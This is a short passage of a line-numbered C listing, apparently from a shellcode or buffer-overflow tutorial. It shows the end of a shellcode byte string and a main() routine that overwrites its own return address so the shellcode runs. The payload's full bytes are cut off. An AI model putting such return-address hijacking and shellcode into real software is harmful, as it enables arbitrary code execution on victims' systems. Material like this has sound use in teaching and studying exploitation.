47 | "\xe1\xcd\x80"; 48 | 49 | main() { 50 | long *ret; 51 | 52 | ret = (long *)&ret + 2; 53 | (*ret) = (long)shellcode; 54 | 55 | } 56 | 57 | --------------------------------------------------------------------------------